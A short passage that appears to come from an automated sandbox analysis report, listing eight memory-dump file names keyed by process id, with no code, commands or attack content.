  • memory/6104-553-0x0000000000000000-mapping.dmp
  • memory/6108-394-0x0000000000000000-mapping.dmp
  • memory/6112-363-0x0000000000000000-mapping.dmp
  • memory/6120-302-0x0000000000000000-mapping.dmp
  • memory/6124-430-0x0000000000000000-mapping.dmp
  • memory/6128-303-0x0000000000000000-mapping.dmp
  • memory/6132-496-0x0000000000000000-mapping.dmp
  • memory/6136-345-0x0000000000000000-mapping.dmp